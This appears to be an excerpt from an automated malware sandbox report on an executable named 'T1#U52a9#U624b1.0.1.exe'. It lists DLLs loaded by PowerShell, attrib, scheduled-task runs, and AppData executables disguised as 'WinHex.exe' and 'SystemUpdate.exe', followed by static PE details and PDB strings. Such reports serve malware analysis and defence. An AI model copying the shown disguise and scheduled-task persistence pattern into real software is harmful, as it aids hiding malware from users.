Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: mfc42u.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: wdscore.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: version.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: wimgapi.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: riched32.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\LineInst.exe Section loaded: apphelp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: apphelp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: aclayers.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: mpr.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sfc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sfc_os.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: version.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: cabinet.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wtsapi32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winhttp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: kernel.appcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dbghelp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dbgcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: slc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sppc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: mfc42u.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wmsgapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wdscore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: uxtheme.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: netapi32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: slc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sppc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wkscli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: netutils.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: msasn1.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: unbcl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: fltlib.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: virtdisk.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: profapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: xmllite.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: unbcl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: fltlib.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: virtdisk.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: profapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: xmllite.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: riched32.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: riched20.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: usp10.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: msls31.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wbemcomn.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: amsi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: userenv.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: policymanager.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: msvcp110_win.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: vds_ps.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: policymanager.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: msvcp110_win.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winsta.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: iphlpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dhcpcsvc6.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dhcpcsvc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: webio.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: mswsock.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winnsi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dnsapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: rasadhlp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: fwpuclnt.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: schannel.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: mskeyprotect.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ntasn1.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ncrypt.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ncryptsslp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: cryptsp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: rsaenh.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: cryptbase.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: gpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dpapi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: windlp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ntmarta.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: devrtl.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: textshaping.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: windowscodecs.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: textinputframework.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: coreuicomponents.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: coremessaging.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wintypes.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: oleacc.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dataexchange.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: d3d11.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dcomp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: dxgi.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: twinapi.appcore.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: sxs.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: winbrand.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: wldp.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\vdsldr.exe Section loaded: atl.dll
Source: C:\Windows\System32\vdsldr.exe Section loaded: vdsutil.dll
Source: C:\Windows\System32\vdsldr.exe Section loaded: bcd.dll
Source: C:\Windows\System32\vdsldr.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\vdsldr.exe Section loaded: vds_ps.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: version.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: python3.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: libffi-7.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: dinput8.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: devenum.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\WinHex.exe Section loaded: msdmo.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: version.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\SystemUpdate.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\$Windows.~WS\Sources\SetupHost.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\T1#U52a9#U624b1.0.1.exe File opened: C:\Users\user\Desktop\pyvenv.cfg
Source: C:\$Windows.~WS\Sources\SetupHost.exe Automated click: Accept
Source: C:\$Windows.~WS\Sources\SetupHost.exe Automated click: Next
Source: C:\Users\user\AppData\LineInst.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: T1#U52a9#U624b1.0.1.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: T1#U52a9#U624b1.0.1.exe Static file information: File size 38135059 > 1048576
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: T1#U52a9#U624b1.0.1.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: T1#U52a9#U624b1.0.1.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a01\_work\6\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658685678.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786622693.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1829720428.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1662555024.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1801496747.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1838603027.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupPrep.pdbGCTL source: T1#U52a9#U624b1.0.1.exe, 00000001.00000003.1685436843.0000029E76B04000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754464189.0000000006DB1000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000000.1745430758.0000000000A71000.00000020.00000001.01000000.0000000A.sdmp, LineInst.exe, 0000000B.00000003.1748979428.00000000038D0000.00000004.00000020.00020000.00000000.sdmp, LineInst.exe, 0000000B.00000003.1754333515.00000000038F2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdbGCTL source: wdsclientapi.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659065496.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795089608.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831179551.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658826355.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1786800951.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830445848.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WdsClientApi.pdb source: wdsclientapi.dll.11.dr
Source: Binary string: SetupPlatform.pdb source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1658955506.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1787538248.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1830735495.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: SetupHost.pdbGCTL source: SetupHost.exe, 0000000D.00000000.1779120957.00000000004DC000.00000020.00000001.01000000.0000000D.sdmp
Source: Binary string: SetupPlatform.pdbGCTL source: setupplatform.dll.11.dr
Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: T1#U52a9#U624b1.0.1.exe, 00000000.00000003.1659206857.0000021C65B52000.00000004.00000020.00020000.00000000.sdmp, WinHex.exe, 0000000C.00000003.1795346506.000001F51FAC9000.00000004.00000020.00020000.00000000.sdmp, SystemUpdate.exe, 00000013.00000003.1831564639.000001E3DC935000.00000004.00000020.00020000.00000000.sdmp
